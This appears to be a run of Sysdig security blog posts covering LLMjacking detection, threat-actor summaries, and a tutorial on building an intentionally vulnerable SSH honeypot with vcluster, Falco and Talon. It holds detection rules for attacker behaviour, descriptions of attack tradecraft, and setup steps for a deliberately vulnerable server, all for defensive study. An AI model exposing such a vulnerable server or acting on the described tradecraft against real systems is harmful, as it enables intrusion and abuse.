  output: A reconnaissance attempt on Amazon Bedrock has been made (requesting user=%aws.user, requesting IP=%aws.sourceIP, AWS region=%aws.region, arn=%jevt.value[/userIdentity/arn], userAgent=%jevt.value[/userAgent], modelId=%jevt.value[/requestParameters/modelId])
  priority: WARNING

In addition, CloudWatch alerts can be configured to handle suspicious behaviors. Several runtime metrics for Bedrock can be monitored to trigger alerts.
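As one illustration, an alarm on a Bedrock invocation metric could be defined roughly as below. The namespace, metric name, threshold, and SNS topic ARN here are assumptions chosen to show the shape of such an alert, not a verified configuration; tune them to your environment.

```python
# Sketch of a CloudWatch alarm that fires on an unusual spike in Bedrock
# model invocations within a 5-minute window.
alarm = {
    "AlarmName": "bedrock-invocation-spike",
    "Namespace": "AWS/Bedrock",           # assumed Bedrock metric namespace
    "MetricName": "Invocations",          # assumed runtime metric name
    "Statistic": "Sum",
    "Period": 300,                        # 5-minute evaluation window
    "EvaluationPeriods": 1,
    "Threshold": 1000,                    # tune to your normal usage
    "ComparisonOperator": "GreaterThanThreshold",
    "AlarmActions": ["arn:aws:sns:us-east-1:123456789012:security-alerts"],  # placeholder ARN
}

# With boto3, this dict would be passed as keyword arguments:
# import boto3
# boto3.client("cloudwatch").put_metric_alarm(**alarm)
print(alarm["AlarmName"])
```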

Detailed Logging

Monitoring your organization’s use of large language model (LLM) services is crucial, and various cloud vendors provide facilities to streamline this process. This typically involves setting up mechanisms to log and store data about model invocations.

For AWS Bedrock specifically, users can leverage CloudWatch and S3 for enhanced monitoring capabilities. CloudWatch can be set up by creating a log group and assigning a role with the necessary permissions. Similarly, logging to S3 requires a designated bucket as a destination. It is important to note that the CloudTrail log of the InvokeModel command does not capture details about the prompt input and output. However, Bedrock settings allow for easy activation of model invocation logging. Additionally, for model input or output data larger than 100kb or in binary format, users must explicitly specify an S3 destination to handle large data delivery. This includes input and output images, which are stored in the logs as Base64 strings. Such comprehensive logging mechanisms ensure that all aspects of model usage are monitored and archived for further analysis and compliance.

The logs contain additional information about the tokens processed, as shown in the following example:

{
    "schemaType": "ModelInvocationLog",
    "schemaVersion": "1.0",
    "timestamp": "[REDACTED]",
    "accountId": "[REDACTED]",
    "identity": {
        "arn": "[REDACTED]"
    },
    "region": "us-east-1",
    "requestId": "bea9d003-f7df-4558-8823-367349de75f2",
    "operation": "InvokeModel",
    "modelId": "anthropic.claude-v2",
    "input": {
        "inputContentType": "application/json",
        "inputBodyJson": {
            "prompt": "\n\nHuman: Write a story of a young wizard\n\nAssistant:",
            "max_tokens_to_sample": 300
        },
        "inputTokenCount": 16
    },
    "output": {
        "outputContentType": "application/json",
        "outputBodyJson": {
            "completion": " Here is a story about a young wizard:\n\nMartin was an ordinary boy living in a small village. He helped his parents around their modest farm, tending to the animals and working in the fields. [...] Martin's favorite subject was transfiguration, the art of transforming objects from one thing to another. He mastered the subject quickly, amazing his professors by turning mice into goblets and stones into fluttering birds.\n\nMartin",
            "stop_reason": "max_tokens",
            "stop": null
        },
        "outputTokenCount": 300
    }
}

Example S3 log
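Because each ModelInvocationLog record carries token counts, the S3 or CloudWatch logs can be aggregated to spot abusive consumption. A small illustrative parser (ours, not part of any Sysdig tooling):

```python
def total_tokens(records):
    """Sum input and output token counts across ModelInvocationLog records."""
    total = 0
    for rec in records:
        total += rec.get("input", {}).get("inputTokenCount", 0)
        total += rec.get("output", {}).get("outputTokenCount", 0)
    return total

# Using the counts from the example record above (16 in, 300 out):
records = [{"input": {"inputTokenCount": 16},
            "output": {"outputTokenCount": 300}}]
print(total_tokens(records))  # 316
```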

Recommendations

This attack could have been prevented in a number of ways, including:

  • Vulnerability management to prevent initial access.
  • Secrets management to ensure credentials are not stored in the clear where they can be stolen.
  • CSPM/CIEM to ensure the abused account had the least amount of permissions it needed.

As highlighted by recent research, cloud vendors offer a range of tools and best practices designed to mitigate the risks of cloud attacks. These tools help organizations build and maintain a secure cloud environment from the outset.

For instance, AWS provides several robust security measures. The AWS Security Reference Architecture outlines best practices for securely constructing your cloud environment. Additionally, AWS recommends using Service Control Policies (SCP) to centrally manage permissions, which helps minimize the risk associated with over-permissioned accounts that could potentially be abused. These guidelines and tools are part of AWS’s commitment to enhancing security and providing customers with the resources to protect their cloud infrastructure effectively. Other cloud vendors offer similar frameworks and tools, ensuring that users have access to essential security measures to safeguard their data and services regardless of the platform.

Conclusion

Stolen cloud and SaaS credentials continue to be a common attack vector. This trend will only increase in popularity as attackers learn all of the ways they can leverage their new access for financial gain. The use of LLM services can be expensive, depending on the model and the amount of tokens being fed to it. Normally, this would cause a developer to try and be efficient — sadly, attackers do not have the same incentive. Detection and response is critical to deal with any issues quickly. 

IoCs

IP Addresses

83.7.139.184

83.7.157.76

73.105.135.228

83.7.135.97

The post LLMjacking: Stolen Cloud Credentials Used in New AI Attack appeared first on Sysdig.

Meet the Research behind our Threat Research Team https://sysdig.com/blog/sysdig-threat-research-team-rsa-2024/ Fri, 26 Apr 2024 15:30:00 +0000 https://sysdig.com/?p=88470
The Sysdig Threat Research Team (TRT)  is on a mission to help secure innovation at cloud speeds.

A group of some of the industry’s most elite threat researchers, the Sysdig TRT discovers and educates on the latest cloud-native security threats, vulnerabilities, and attack patterns.

We are fiercely passionate about security and committed to the cause. Stay up to date here on the latest insights, trends to monitor, and crucial best practices for securing your cloud-native environments. Or come meet us at RSA; we’ll be at booth S-742.

Below we will detail the latest research that has been carried out and how we have improved the security ecosystem.

SSH-SNAKE

SSH-Snake  is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network. The worm automatically searches through known credential locations and shell history files to determine its next move. SSH-Snake is actively being used by threat actors in offensive operations. 

Sysdig TRT uncovered the command and control (C2) server of threat actors deploying SSH-Snake. This server holds a repository of files containing the output of SSH-Snake for each of the targets they have gained access to. 

Filenames found on the C2 server contain IP addresses of victims, which allowed us to make a high confidence assessment that these threat actors are actively exploiting known Confluence vulnerabilities in order to gain initial access and deploy SSH-Snake. This does not preclude other exploits from being used, but many of the victims are running Confluence.  

Output of SSH-Snake contains the credentials found, the IPs of the targets, and the bash history of the victims. We are witnessing the victim list growing, which means that this is an ongoing operation. At the time of writing, the number of victims is approximately 300.

RUBYCARP

Sysdig TRT discovered a long-running botnet operated by a Romanian threat actor group, which we are calling RUBYCARP. Evidence suggests that this threat actor has been active for at least 10 years. Its primary method of operation leverages a botnet deployed using a variety of public exploits and brute force attacks. This group communicates via public and private IRC networks, develops cyber weapons and targeting data, and uses its botnet for financial gain via cryptomining and phishing. This report explores how RUBYCARP operates and its motivations.

RUBYCARP, like many threat actors, is interested in payloads that enable financial gain. This includes cryptomining, DDoS, and Phishing. We have seen it deploy a number of different tools to monetize its compromised assets. For example, through its Phishing operations, RUBYCARP has been seen targeting credit cards.

SCARLETEEL

SCARLETEEL, a complex operation discovered in 2023, continues to thrive. Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture. AWS Fargate, a more sophisticated environment to breach, has also become a target as their new attack tools allow them to operate within that environment.

The attack graph discovered by this group is the following: 

Compromise AWS accounts through exploiting vulnerable compute services, gain persistence, and attempt to make money using cryptominers. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped.

We know that they are not only after cryptomining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then do with it what they wanted. We also watched them target Kubernetes in order to significantly scale their attack.

AMBERSQUID

Keeping with the cloud threats, The Sysdig TRT has uncovered a novel cloud-native cryptojacking operation which they’ve named AMBERSQUID. This operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker. The uncommon nature of these services means that they are often overlooked from a security perspective, and the AMBERSQUID operation can cost victims more than $10,000/day.

The AMBERSQUID operation was able to exploit cloud services without triggering the AWS requirement for approval of more resources, as would be the case if they only spammed EC2 instances. Targeting multiple services also poses additional challenges, like incident response, since it requires finding and killing all miners in each exploited service.

We discovered AMBERSQUID by performing an analysis of over 1.7 million Linux images in order to understand what kind of malicious payloads are hiding in the container images on Docker Hub.

This dangerous container image didn’t raise any alarms during static scanning for known indicators or malicious binaries. It was only when the container was run that its cross-service cryptojacking activities became obvious. This is consistent with the findings of our 2023 Cloud Threat Report, in which we noted that 10% of malicious images are missed by static scanning alone.

MESON NETWORK

Sysdig TRT discovered a malicious campaign using the blockchain-based Meson service to reap rewards ahead of the crypto token unlock happening around March 15th 2024. Within minutes, the attacker attempted to create 6,000 Meson Network nodes using a compromised cloud account. The Meson Network is a decentralized content delivery network (CDN) that operates in Web3 by establishing a streamlined bandwidth marketplace through a blockchain protocol.

Within minutes, the attacker was able to spawn almost 6,000 instances inside the compromised account across multiple regions and execute the meson_cdn binary. This comes at a huge cost for the account owner. As a result of the attack, we estimate a cost of more than $2,000 per day for all the Meson network nodes created, even just using micro sizes. This isn’t counting the potential costs for public IP addresses which could run as much as $22,000 a month for 6,000 nodes! Estimating the reward tokens amount and value the attacker could earn is difficult since those Meson tokens haven’t had values set yet in the public market.
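The public IP figure can be sanity-checked against AWS's per-hour public IPv4 charge; we assume here the $0.005/hour rate AWS introduced in 2024, which is our assumption rather than a figure from the investigation:

```python
nodes = 6000                 # instances spawned by the attacker
ipv4_cost_per_hour = 0.005   # USD, assumed AWS public IPv4 hourly rate

monthly_ip_cost = nodes * ipv4_cost_per_hour * 24 * 30
print(f"${monthly_ip_cost:,.0f} / month")  # roughly the $22,000 cited above
```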

As with AMBERSQUID, the image looks legitimate and safe from a static point of view, which involves analyzing its layers and vulnerabilities. During runtime execution, however, we monitored outbound network traffic and spotted gaganode being executed and making connections to malicious IPs.

LABRAT

The LABRAT operation set itself apart from others due to the attacker’s emphasis on stealth and defense evasion in their attacks. It is common to see attackers utilize scripts as their malware because they are simpler to create. However, this attacker chose to use undetected compiled binaries, written in Go and .NET, which allowed the attacker to hide more effectively.

The attacker utilized undetected signature-based tools, sophisticated and stealthy cross-platform malware, command and control (C2) tools which bypassed firewalls, and kernel-based rootkits to hide their presence. To generate income, the attacker deployed both cryptomining and Russian-affiliated proxyjacking scripts. Furthermore, the attacker abused a legitimate service, TryCloudFlare, to obfuscate their C2 network.

One obvious goal for this attacker was to generate income using proxyjacking and cryptomining. Proxyjacking allows the attacker to “rent” the compromised system out to a proxy network, basically selling the compromised IP Address. There is a definite cost in bandwidth, but also a potential cost in reputation if the compromised system is used in an attack or other illicit activities. Cryptomining can also incur significant financial damages if not stopped quickly. Income may not be the only goal of the LABRAT operation, as the malware also provided backdoor access to the compromised systems. This kind of access could lend itself to other attacks, such as data theft, leaks, or ransomware.

Detecting attacks that employ several layers of defense evasion, such as this one, can be challenging and requires a deep level of runtime visibility.

CVEs

Hunting for new malicious actors is not the TRT's only purpose; the team also reacts quickly to newly disclosed vulnerabilities and updates the product with new rules to detect them at runtime. The two most recent examples are shown below.

CVE-2024-3094

On March 29th, 2024, a backdoor in a popular package called XZ Utils was announced on the Openwall mailing list. This utility includes a library called liblzma, which is used by SSHD, a critical part of the Internet infrastructure used for remote access. When loaded, the backdoor (CVE-2024-3094) compromises SSHD authentication, potentially allowing intruders access regardless of the authentication method.

  • Affected versions: 5.6.0, 5.6.1
  • Affected Distributions: Fedora 41, Fedora Rawhide

For Sysdig Secure users, this rule is called “Backdoored library loaded into SSHD (CVE-2024-3094)” and can be found in the Sysdig Runtime Threat Detection policy.

- rule: Backdoored library loaded into SSHD (CVE-2024-3094)
  desc: A version of the liblzma library was seen loading which was backdoored by a malicious user in order to bypass SSHD authentication.
  condition: open_read and proc.name=sshd and (fd.name endswith "liblzma.so.5.6.0" or fd.name endswith "liblzma.so.5.6.1")
  output: SSHD Loaded a vulnerable library (| file=%fd.name | proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] image=%container.image.repository | proc.cmdline=%proc.cmdline | container.name=%container.name | proc.cwd=%proc.cwd proc.pcmdline=%proc.pcmdline user.name=%user.name user.loginuid=%user.loginuid user.uid=%user.uid user.loginname=%user.loginname image=%container.image.repository | container.id=%container.id | container_name=%container.name|  proc.cwd=%proc.cwd )
  priority: WARNING
  tags: [host, container]

Leaky Vessels

On January 31st, 2024, Snyk announced the discovery of four vulnerabilities in Kubernetes and Docker:

  • CVE-2024-21626: CVSS – High, 8.6
  • CVE-2024-23651: CVSS – High, 8.7
  • CVE-2024-23652: CVSS – Critical, 10
  • CVE-2024-23653: CVSS – Critical, 9.8

For Kubernetes, the vulnerabilities are specific to the runc CRI. Successful exploitation allows an attacker to escape the container and gain access to the host operating system. To exploit these vulnerabilities, an attacker will need to control the Dockerfile when the containers are built.

The following Falco rule will detect the affected container runtimes trying to change the directory to a proc file descriptor, which isn’t normal activity.  This rule should be considered experimental and can be used in OSS Falco and Sysdig Secure as a custom rule.

- rule: Suspicious Chdir Event Detected
  desc: Detects a process changing a directory using a proc-based file descriptor.
  condition: >
    evt.type=chdir and evt.dir=< and evt.rawres=0 and evt.arg.path startswith "/proc/self/fd/"
  output: >
    Suspicious Chdir event detected, executed by process %proc.name with cmdline %proc.cmdline under user %user.name (details=%evt.args proc.cmdline=%proc.cmdline evt.type=%evt.type evt.res=%evt.res fd=%evt.arg.fd nstype=%evt.arg.nstype proc.pid=%proc.pid proc.cwd=%proc.cwd proc.pname=%proc.pname proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath user.name=%user.name user.loginuid=%user.loginuid user.uid=%user.uid user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name container.id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
  priority: WARNING
  tags: [host, container]

MEET SYSDIG TRT AT RSAC 2024

Sysdig Threat Research Team (TRT) members will be onsite at booth S-742 at RSA Conference 2024, May 6 – 9 in San Francisco, to share insights from their findings and analysis of some of the hottest and most important cybersecurity topics this year.

Reserve a time to connect with the Sysdig TRT team at the show!

The post Meet the Research behind our Threat Research Team appeared first on Sysdig.

Building Honeypots with vcluster and Falco: Episode II https://sysdig.com/blog/honeypots-vcluster-and-falco-episode-ii/ Wed, 10 Apr 2024 21:00:00 +0000 https://sysdig.com/?p=86701
This is part two in our series on building honeypots with Falco, vcluster, and other assorted open source tools. For the previous installment, see Building honeypots with vcluster and Falco: Episode I.

When Last We Left our Heroes

In the previous article, we discussed high-interaction honeypots and used vcluster to build an intentionally-vulnerable SSH server inside of its own cluster so it couldn’t hurt anything else in the environment when it got owned. Then, we installed Falco on the host and proceeded to attack the SSH server, watching the Falco logs to see the appropriate rule trigger when we read /etc/shadow. 

This is all great, but it’s just a start. This time around, we’ll be adding additional functionality to our honeypot so we can react to what is happening inside it. Some of these additional pieces will also be laying down the infrastructure for adding additional functionality down the road. 

We’ll be going beyond the basics, and this is where things start to get fun.

Our Shortcomings

The setup from the previous article had two major shortcomings. There are a few more, but we’ll get to those later.

First, the previous iteration of our honeypot required being run directly on an OS sitting on an actual hunk of hardware. This is of limited utility as it really doesn’t scale well unless we want to set up an army of hardware to support our eventual sprawl of honeypot bits. At the time, this was the only way we could do this with Minikube and Falco, as the Falco of yore didn’t have the kernel modules we needed to do otherwise. Fortunately, this is no longer the case. We can now take a more cloud-native approach and build this on an EC2 instance in AWS, and everything will be satisfactory. To the cloud!

NOTE: We’re going to be building a honeypot which is, by definition, an intentionally vulnerable system. We won’t have much in the way of monitoring built out just yet, so we don’t suggest that you expose it to the internet.

Second, the old honeypot didn’t do much other than complain into the Falco logs when we went poking around in the pod’s sensitive files. This, we can also fix. We’re going to be using Falcosidekick and Falco Talon to make our honeypot actually do something when we go tripping Falco rules.

Response Engines

Response engine is a term often used in the context of EDR (Endpoint Detection and Response), SIEM (Security Information and Event Management), SOAR (Security Orchestration, Automation and Response), and XDR (Extended Detection and Response). See EDR vs. XDR vs. SIEM vs. MDR vs. SOAR for more information. 

It’s a component that executes an automated response to security threats. This is exactly the tool we need in this case. 

When we trip one of the Falco rules by interacting with our honeypot, we need to take automatic action. In our particular case, we’re going to be shutting down the pod that the attackers have owned so we can spin a clean one back up in its place. We’ll be using a tool called Falco Talon for this. We’re also going to include another tool, Falcosidekick, that will allow us some additional flexibility down the road to do other things in response to the events that happen in our environment. 

Falco Sidekick


Falcosidekick is a great tool that enables us to connect Falco up to many other interesting bits and pieces. We can use it to perform monitoring and alerting, ship logs off to different tools, and all sorts of other things. This is the glue piece that we will use to send the events to Falco Talon. 

Falco Talon

Falco Talon is the piece that will be performing the actual responses to the Falco rules that get tripped. Talon has its own internal set of rules that defines which Falco rules it should respond to and what it should do when they are triggered. 

Getting Our Hands Dirty

Let’s jump right in and build some things. 

This time around, we’ll be building our honeypot on an Ubuntu Server 22.04 t3.xlarge EC2 instance on AWS. You may be able to go with a smaller instance, but there is a point at which the instance won’t have sufficient resources for everything to spin up. Very small instances, such as the t2.micro, will almost certainly not have sufficient horsepower for everything to function properly. 

In theory, you should be able to build this on any of the similar cloud services and have it work, as long as you have all the proper application bits in place. 

As a prerequisite, you will need to have installed the following tools, at the noted version or higher:

The rest we’ll install as we work through the process. 

Fire Up Minikube

First, we want to start up minikube using the docker driver. We'll see it go through its paces and download a few dependencies.

Next, we'll enable the ingress addon for minikube. This will allow us to reach the SSH server that we'll be installing shortly.

$ minikube start --vm-driver=docker

😄  minikube v1.32.0 on Ubuntu 22.04
✨  Using the docker driver based on user configuration
📌  Using Docker driver with root privileges
👍  Starting control plane node minikube in cluster minikube
🚜  Pulling base image ...
💾  Downloading Kubernetes v1.28.3 preload ...
    > preloaded-images-k8s-v18-v1...:  403.35 MiB / 403.35 MiB  100.00% 51.69 M
🔥  Creating docker container (CPUs=2, Memory=3900MB) ...
🐳  Preparing Kubernetes v1.28.3 on Docker 24.0.7 ...
    ▪ Generating certificates and keys ...
    ▪ Booting up control plane ...
    ▪ Configuring RBAC rules ...
🔗  Configuring bridge CNI (Container Networking Interface) ...
    ▪ Using image gcr.io/k8s-minikube/storage-provisioner:v5
🔎  Verifying Kubernetes components...
🌟  Enabled addons: storage-provisioner, default-storageclass
🏄  Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default

$ minikube addons enable ingress

💡  ingress is an addon maintained by Kubernetes. For any concerns contact minikube on GitHub.
You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS
    ▪ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20231011-8b53cabe0
    ▪ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20231011-8b53cabe0
    ▪ Using image registry.k8s.io/ingress-nginx/controller:v1.9.4
🔎  Verifying ingress addon...
🌟  The 'ingress' addon is enabled


Install Falco

First, we need to add the falcosecurity helm repo so we can access the helm chart for Falco.

Once we have the repo added, we'll update to get the latest chart.

Next, we'll use kubectl to create a namespace for Falco to live in. We'll also use this same namespace later for Sidekick and Talon.

Now, we'll kick off the Falco install. You'll notice here we have a few additional arguments to disable buffering for the Falco logs so we get events more quickly, install Sidekick during the Falco install, enable the web UI, and set up the outgoing webhook for Sidekick to point at the URL where Talon will shortly be listening.

$ helm repo add falcosecurity https://falcosecurity.github.io/charts
"falcosecurity" has been added to your repositories

$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
...Successfully got an update from the "securecodebox" chart repository
...Successfully got an update from the "stable" chart repository
Update Complete. ⎈Happy Helming!⎈

$ kubectl create namespace falco
namespace/falco created

$ helm install falco falcosecurity/falco --namespace falco \
--set tty=true \
--set falcosidekick.enabled=true \
--set falcosidekick.webui.enabled=true \
--set falcosidekick.config.webhook.address="http://falco-talon:2803"
NAME: falco
LAST DEPLOYED: Wed Dec  0 19:38:38 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 1
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


No further action should be required.


💡Note: If you want to dig deeper into Falco, take a look at the course Falco 101.

Update the Falco Rules

Later on, we’ll be setting up a port forward for the SSH server so we can reach it. Falco is going to be vocal about this and it will trigger the “Redirect STDOUT/STDIN to Network Connection in Container” rule a LOT, which will make it difficult to see the rule we actually care about in the Falco logs, as well as send quite a lot of extra events to Talon. Let’s just disable that rule.

If you want to take a look at the rule we’re disabling, you can find it in the Falco rules repo here.

1 – We’re going to make a temporary file to hold our rule modification, into which we will insert a customRules section.

2 – Next, we’ll add the override.yaml.

3 – Then, the existing rule from the Falco rules file that we’re going to override.

4 – And, tell Falco that we want to disable it.

6 – Then, we’ll use helm to upgrade Falco and feed it the file we made, telling it to reuse the rest of the values it previously had.

21 – Lastly, we’ll kill off the existing Falco pods so we get new ones with the rule disabled in their rulesets.

$ echo "customRules:" > /tmp/customrules.yaml
$ echo "  override.yaml: |-" >> /tmp/customrules.yaml
$ echo "    - rule: Redirect STDOUT/STDIN to Network Connection in Container" >> /tmp/customrules.yaml
$ echo "      enabled: false" >> /tmp/customrules.yaml
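If you prefer, the same file can be written in one shot with a heredoc instead of repeated echoes (a sketch producing the identical /tmp/customrules.yaml):

```shell
# Write the Falco rule override in a single heredoc
cat > /tmp/customrules.yaml <<'EOF'
customRules:
  override.yaml: |-
    - rule: Redirect STDOUT/STDIN to Network Connection in Container
      enabled: false
EOF

# Show the result
cat /tmp/customrules.yaml
```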

$ helm upgrade falco falcosecurity/falco --namespace falco --values /tmp/customrules.yaml --reuse-values
Release "falco" has been upgraded. Happy Helming!
NAME: falco
LAST DEPLOYED: Wed Dec  0 23:56:23 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 2
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


No further action should be required.

$ kubectl delete pods -n falco -l app.kubernetes.io/name=falco
pod "falco-94wsk" deleted


Install Falco Talon

Now let’s install Falco Talon.

1 – As it’s currently an alpha, Talon isn’t published in the standard helm repos. We’ll clone the Talon repo from GitHub to get a copy of the helm chart. 

12 – If we take a quick look at the Talon repo, we can see the helm chart for it, as well as a couple yaml files that hold its configuration. We’ll be changing the rules.yaml in the next set of steps.

16 – Now, a quick helm install of Talon into the falco namespace alongside Falco and Sidekick.

$ git clone https://github.com/Issif/falco-talon.git /tmp/falco-talon

Cloning into '/tmp/falco-talon'...
remote: Enumerating objects: 1599, done.
remote: Counting objects: 100% (744/744), done.
remote: Compressing objects: 100% (349/349), done.
remote: Total 1599 (delta 473), reused 565 (delta 338), pack-reused 855
Receiving objects: 100% (1599/1599), 743.58 KiB | 2.81 MiB/s, done.
Resolving deltas: 100% (866/866), done.

$ ls /tmp/falco-talon/deployment/helm/
Chart.yaml  rules.yaml  templates  values.yaml


$ helm install falco-talon /tmp/falco-talon/deployment/helm --namespace falco

NAME: falco-talon
LAST DEPLOYED: Thu Dec  0 00:01:53 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 1
TEST SUITE: None

Update the Talon Rules and Configuration

As we discussed earlier, we need to set up the rules for Talon separately. Let’s take a quick peek at what we have in the rules.yaml now.

1 – Each rule in the file is designated with ‘- name’ and we have a few examples to look at.

21 – This is a rule along the lines of what we want to replicate, though we can drop the parameters section.

$ cat /tmp/falco-talon/deployment/helm/rules.yaml

- name: Rule Labelize
  match:
    rules:
      - Terminal shell in container
    output_fields:
      - k8s.ns.name!=kube-system
  action:
    name: kubernetes:labelize
    parameters:
      labels:
        suspicious: "true"
- name: Rule NetworkPolicy
  match:
    rules:
      - "Outbound Connection to C2 Servers"
  action:
    name: kubernetes:networkpolicy
  before: true
- name: Rule Terminate
  match:
    rules:
      - "Outbound Connection to C2 Servers"
  action:
    name: kubernetes:terminate
    parameters:
      ignoreDaemonsets: true
      ignoreStatefulsets: true


This will work very similarly to how we edited the Falco rules earlier.

1 – We’ll echo a series of lines into the /tmp/falco-talon/deployment/helm/rules.yaml file. We need to name the Talon rule (this is an arbitrary name), tell it which Falco rule we want to match against (this is the specific name of the Falco rule), and then tell it what action we want it to take on a match. In this case, we’ll be terminating the pod.

15 – We need to comment out one of the outputs in the values.yaml in the Talon chart directory while we’re in here, since we won’t be configuring a Slack alert. If we didn’t do this, it wouldn’t hurt anything, but we would see an error later in the Talon logs.

17 – Once again, we’ll do a helm upgrade and point at our updated files. Note that we aren’t using the --reuse-values argument to tell helm to keep the rest of the existing settings this time. If we did, our changes to the values.yaml would not be included.

27 – Then, we need to kill the existing pods to refresh them.

$ echo -e '' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '- name: Sensitive file opened' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '  match:' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '    rules:' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '      - "Read sensitive file untrusted"' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '  action:' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '    name: kubernetes:terminate ' >> /tmp/falco-talon/deployment/helm/rules.yaml
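Put together, the lines appended above amount to this Talon rule:

```yaml
- name: Sensitive file opened
  match:
    rules:
      - "Read sensitive file untrusted"
  action:
    name: kubernetes:terminate
```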

$ sed -i 's/^\s*-\s*slack/ # - slack/' /tmp/falco-talon/deployment/helm/values.yaml
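To see what that sed edit does, here is a quick demo against a hypothetical values.yaml snippet (the real file's layout may differ; only the "- slack" line matters for the substitution):

```shell
# Build a tiny sample file resembling the notifier list (hypothetical content)
printf 'notifiers:\n  - k8sevents\n  - slack\n' > /tmp/values-demo.yaml

# Comment out the slack entry, exactly as done for the Talon chart
sed -i 's/^\s*-\s*slack/ # - slack/' /tmp/values-demo.yaml

# The slack line is now commented; the other notifier is untouched
cat /tmp/values-demo.yaml
```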

$ helm upgrade falco-talon /tmp/falco-talon/deployment/helm --namespace falco

Release "falco-talon" has been upgraded. Happy Helming!
NAME: falco-talon
LAST DEPLOYED: Thu Dec  0 00:10:28 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 2
TEST SUITE: None

$ kubectl delete pods -n falco -l app.kubernetes.io/name=falco-talon

pod "falco-talon-5bcf97655d-gvkv9" deleted
pod "falco-talon-5bcf97655d-wxr4g" deleted


Install vcluster

So that we can run our SSH server in isolation, we’ll download vcluster and set it up.

1 – Here, we’ll set an environment variable to fish out the latest vcluster version from the GitHub repository.

3 – Now, we’ll use that environment variable to construct the download URL.

5 – We’ll use curl to download the file and move it to /usr/local/bin.

11 – Now, let’s check the vcluster version to make sure we got everything installed properly. 

14 – We’ll finish up by creating a vcluster namespace for everything to live in.

$ LATEST_TAG=$(curl -s -L -o /dev/null -w %{url_effective} "https://github.com/loft-sh/vcluster/releases/latest" | rev | cut -d'/' -f1 | rev)

$ URL="https://github.com/loft-sh/vcluster/releases/download/${LATEST_TAG}/vcluster-linux-amd64"

$ curl -L -o vcluster "$URL" && chmod +x vcluster && sudo mv vcluster /usr/local/bin;
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 61.4M  100 61.4M    0     0  80.7M      0 --:--:-- --:--:-- --:--:--  194M

$ vcluster version
vcluster version 0.18.0

$ kubectl create namespace vcluster
namespace/vcluster created
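The rev | cut | rev pipeline above is just a trick for grabbing the last path segment of the redirect URL, which is the release tag. A quick illustration with a fixed example URL (not a live lookup):

```shell
# Extract the last path segment of a URL: reverse the string, take the
# first '/'-delimited field, then reverse it back.
url="https://github.com/loft-sh/vcluster/releases/tag/v0.18.0"
echo "$url" | rev | cut -d'/' -f1 | rev
# → v0.18.0
```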


Install the SSH Server in vcluster

Now that we have vcluster working, we can get our target SSH server installed.

1 – We’ll start off by creating a virtual cluster named ssh in the vcluster namespace. It’s also important to note that we have now switched contexts to the ssh cluster.

14 – Now, we’ll create a namespace called ssh inside our virtual cluster.

17 – We’ll add the securecodebox repo so we can get the chart for the SSH server.

20 – And, do a quick update to pull the latest chart.

27 – Here, we’ll use helm to install the intentionally vulnerable SSH server.

42 – Last, we’ll disconnect from the vcluster, which will switch our context back to minikube.

$ vcluster create ssh -n vcluster

05:36:45 info Detected local kubernetes cluster minikube. Will deploy vcluster with a NodePort & sync real nodes
05:36:45 info Create vcluster ssh...
05:36:45 info execute command: helm upgrade ssh /tmp/vcluster-0.18.0.tgz-1681152849 --kubeconfig /tmp/2282824298 --namespace vcluster --install --repository-config='' --values /tmp/654191707
05:36:46 done Successfully created virtual cluster ssh in namespace vcluster
05:36:46 info Waiting for vcluster to come up...
05:37:11 info Stopping docker proxy...
05:37:21 info Starting proxy container...
05:37:21 done Switched active kube context to vcluster_ssh_vcluster_minikube
- Use `vcluster disconnect` to return to your previous kube context
- Use `kubectl get namespaces` to access the vcluster

$ kubectl create namespace ssh
namespace/ssh created

$ helm repo add securecodebox https://charts.securecodebox.io/
"securecodebox" already exists with the same configuration, skipping

$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
...Successfully got an update from the "securecodebox" chart repository
...Successfully got an update from the "stable" chart repository
Update Complete. ⎈Happy Helming!⎈

$ helm install my-dummy-ssh securecodebox/dummy-ssh --version 3.4.0 --namespace ssh \
--set global.service.type="nodePort"

NAME: my-dummy-ssh
LAST DEPLOYED: Fri Dec  0 05:38:10 2023
NAMESPACE: ssh
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Demo SSH Server deployed.

Note this should used for demo and test purposes.
Do not expose this to the Internet!

$ vcluster disconnect

05:38:19 info Successfully disconnected from vcluster: ssh and switched back to the original context: minikube


Test Everything Out

Okay! Now we have everything built. Let’s give it a test.

You may recall the vcluster reference diagram from the previous article. It will be helpful to keep that architecture in mind as we work through this.

